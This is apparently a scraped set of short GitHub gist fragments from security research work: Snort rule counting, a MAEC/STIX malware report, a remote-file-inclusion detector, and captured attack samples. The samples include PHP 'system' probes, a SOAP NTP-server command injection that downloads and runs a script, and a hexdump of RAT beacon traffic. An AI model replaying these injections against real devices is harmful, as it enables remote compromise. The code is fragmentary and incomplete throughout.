glaslos /
Created July 30, 2013 13:47
Snort rules related to HTTP ports
import requests
rule_count = 0
http_rule_count = 0
r = requests.get("")
for line in r.text.split("\n"):
if line.strip() == "#":
rule_count += 1
elif "$HTTP_PORTS" in line:
.. |landscape| image::
:alt: Code Health
glaslos /
Created August 7, 2014 08:30
maec in stix example
from lxml import etree
from maec.package.package import Package
from stix.extensions.malware.maec_4_1_malware import MAECInstance
malware_package = Package()
maec_malware_instance = MAECInstance()
maec_malware_instance.maec = etree.fromstring(
malware_package.to_xml(), parser=etree.ETCompatXMLParser()

glaslos /
Last active March 23, 2016 23:38
import SimpleHTTPServer
import SocketServer
paths = set()
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Detect remote file inclusion
if '=http' in self.path:
import sys
import tty
import termios
fd = sys.stdin.fileno()
# keep original terminal settings
old_settings = termios.tcgetattr(fd)
system("uname -a");
<?php echo("test successful"); ?>
glaslos / SOAP.xml
Created January 9, 2017 12:00
Get me some soap...
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="" SOAP-ENV:encodingStyle="">
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /var/tmp;cd /tmp;wget;sh a`</NewNTPServer1>
00000000 6c 76 7c 27 7c 27 7c 56 48 4a 76 61 6d 46 75 58 |lv|'|'|VHJvamFuX|
00000010 30 4d 30 4e 6b 59 32 52 54 6b 3d 7c 27 7c 27 7c |0M0NkY2RTk=|'|'||
00000020 4d 41 52 4b 7c 27 7c 27 7c 75 73 65 72 7c 27 7c |MARK|'|'|user|'||
00000030 27 7c 32 30 31 33 2d 31 31 2d 32 32 7c 27 7c 27 |'|2013-11-22|'|'|
00000040 7c 7c 27 7c 27 7c 57 69 6e 20 58 50 7c 27 7c 27 |||'|'|Win XP|'|'|
00000050 7c 4e 6f 7c 27 7c 27 7c 30 2e 36 2e 34 7c 27 7c ||No|'|'|0.6.4|'||
00000060 27 7c 2e 2e 7c 27 7c 27 7c 7c 27 7c 27 7c 5b 65 |'|..|'|'||'|'|[e|
00000070 6e 64 6f 66 5d |ndof]|
>>> base64.b64decode("VHJvamFuX0M0NkY2RTk=")